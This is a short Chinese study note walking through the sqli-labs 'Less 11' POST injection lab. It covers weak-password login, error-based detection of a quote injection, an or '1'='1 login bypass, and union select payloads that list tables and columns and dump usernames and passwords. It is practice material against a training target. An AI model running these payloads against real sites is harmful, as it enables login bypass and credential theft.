#sqli-labs less 11
终于到post的阶段了
首先试一下常见的弱口令
username:admin password:admin
结果就成功了。。。
算了,‘正规套路’去搞吧
顺便练练burp
在登陆框中写入 admin 111
接下来试试
admin’
111
得到>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘111’ LIMIT 0,1’ at line 1证明是单引号字符型
尝试用admin’or 1=1–+
admin’or ‘1’=‘1’ --+
发现admin’or ‘1’='1–+ 可以顺利绕过
接下来试着用admin’ order by n–+
通过改变n 发现到order by 3时 才回显错误
接着用admin’ union select 1,2–+ 来查看回显位,却一直不能成功
接着我试了在passwd=11’ union select 1,2–+,回显成功
这。。。我得查查
反正接下来在passwd这注入点进行攻击
11’nion select user(),version() --+
ok 用 常规的playload
union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’)–+
union select 1,(select group_concat(column_name)from information_schema.columns where table_name=‘users’)–+
union select 1,(select group_concat(username,’;’,password) from security.users)–+
(select group_concat(username,’;’,password) from security.users)–+
…